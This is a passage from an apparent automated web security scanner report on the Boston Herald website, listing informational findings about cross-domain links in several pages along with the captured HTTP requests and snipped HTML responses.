<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Bruins cap season ticket sales');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/teamstats.aspx?team=121" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/players.aspx?id=740,pos=G,team=121,Type=Regular" >stats</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1294575&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(7) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/3ef2c1_Segs_11072010.JPG" alt="SIZZLING: Attendance at Bruins games..." /></div>
...[SNIP]...
<a href="/track/inside_track/view/20101108we_hear_cam_neely_kevin_youkilis_gordon_ramsey_and_more/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/eb101e_cam_11082010.jpg" alt="We Hear: Cam Neely, Kevin Youkilis, Gordon Ramsey and more..." /></a>
...[SNIP]...
<a href="/sports/hockey/bruins/view/20101106halak_post_too_strong_as_bruins_falter_in_shootout_against_blues/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4479a3_Bs_11072010.jpg" alt="Tuukka Rask, Bruins piped in SO, left feeling the Blues" /></a>
...[SNIP]...
<a href="/sports/hockey/bruins/view/20101106shawn_thornton_hits_300_with_goal_in_mind/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/fa0e8a_Fite_11062010.jpg" alt="Shawn Thornton hits 300 with goal in mind" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1294575%26srvc%3Drss&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.6. http://bostonherald.com/business/healthcare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/business/healthcare/?srvc=home&position=5

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fhealthcare%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/medical_tip/PartnersHealthTip300x250_1.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/business/healthcare/
http://multimedia.heraldinteractive.com/images/20101026/stp/428063_bizz_10272010.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/eca969_Hosp_10222010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/20ad74_SBiz_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/275791_tamiflu.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /business/healthcare/?srvc=home&position=5 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:15:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Healthcare - Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/healthcare/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fhealthcare%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.7. http://bostonherald.com/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/entertainment/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F%3Fsrvc%3Drss&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_300x100.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/guestlisted.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/edge/tonight.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/gotta_love_it_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/spread_the_love_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/watch_this_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/entertainment
http://feeds.feedburner.com/bostonherald/entertainment/
http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/
http://feeds.feedburner.com/bostonherald/entertainment/books/
http://feeds.feedburner.com/bostonherald/entertainment/fashion/
http://feeds.feedburner.com/bostonherald/entertainment/food_dining/
http://feeds.feedburner.com/bostonherald/entertainment/health/
http://feeds.feedburner.com/bostonherald/entertainment/lifestyle/
http://feeds.feedburner.com/bostonherald/entertainment/movies/
http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/
http://feeds.feedburner.com/bostonherald/entertainment/music/
http://feeds.feedburner.com/bostonherald/entertainment/music/reviews/
http://feeds.feedburner.com/bostonherald/entertainment/television/
http://feeds.feedburner.com/bostonherald/entertainment/travel/
http://multimedia.heraldinteractive.com/images/20101102/stp/7fc56b_02seda1.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/efd7c5_ltpback20101105.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/4dacb6_7209c7_ltpeven20100920.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/5187df_ltpdvd20101107.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/bb7782_ltpmodel20101107.jpg
http://multimedia.heraldinteractive.com/images/20101107/bba51e_ipad.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/3ec29e_07tosc1.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/5ded1d_ltpgame20101108.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/8c3eda_ltptamb20101108.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/91dbf1_ltpdisc20101108.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/ccc5cd_ltptomp20101108.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /entertainment/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:34:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Entertainment - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F%3Fsrvc%3Drss&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1294662"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/bba51e_ipad.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.8. http://bostonherald.com/entertainment/arts_culture/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/arts_culture/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/entertainment/arts_culture/view.bg?articleid=1294372&srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Farts_culture%2Fview.bg%3Farticleid%3D1294372&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101104/stp/7355b4_Rhys_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101105/212eda_Spidey_10082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /entertainment/arts_culture/view.bg?articleid=1294372&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:38:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Farts_culture%2Fview.bg%3Farticleid%3D1294372&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Spider-Man musical stuck in a web of troubles');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294372&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(0) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101105/212eda_Spidey_10082010.jpg" alt="The opening of Broadway’s..." /></div>
...[SNIP]...
<a href="/entertainment/movies/general/view/20101104new_spider-man_villain_is_good_at_being_bad/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/7355b4_Rhys_11052010.jpg" alt="New ‘Spider-Man’ villain is good at being bad" /></a>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
